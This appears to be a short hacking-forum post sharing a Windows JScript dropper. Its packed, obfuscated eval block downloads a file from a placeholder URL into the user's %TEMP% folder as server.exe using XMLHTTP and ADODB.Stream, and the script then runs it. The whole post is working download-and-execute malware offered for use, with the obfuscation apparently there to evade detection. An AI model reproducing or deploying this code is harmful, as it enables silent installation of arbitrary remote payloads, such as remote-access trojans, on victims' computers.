10 Years of Service
71%
[HIDE-THANKS]
[/HIDE-THANKS]
Code:
>
var WshShell = WScript.CreateObject("WScript.Shell");
var foul = WshShell.ExpandEnvironmentStrings("%TEMP%");
function DfL(BURL, nameoffile)
{
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b{8 0=5 6(\'g.h\')}l(e){4.c(\'d f\');4.7()}8 3=5 6(\'i.j\');3.k(\'a\',m,n);3.o();p(3.q==r){0.s();0.t=1;0.u(3.v);0.w(x,2);0.y();0=9}z{4.7()}3=9;',36,36,'oStream|||oXMLHTTP|WScript|new|ActiveXObject|Quit|var|null|GET|try|Echo|not||supported|ADODB|Stream|MSXML2|XMLHTTP|open|catch|BURL|false|send|if|Status|200|Open|Type|Write|ResponseBody|SaveToFile|nameoffile|Close|else'.split('|'),0,{}))
}
MyObject = new ActiveXObject( "WScript.Shell" )
function RunExe()
{
MyObject.Run(foul+ "\\server.exe");
}
DfL('direct url server', foul+'\\server.exe');
RunExe();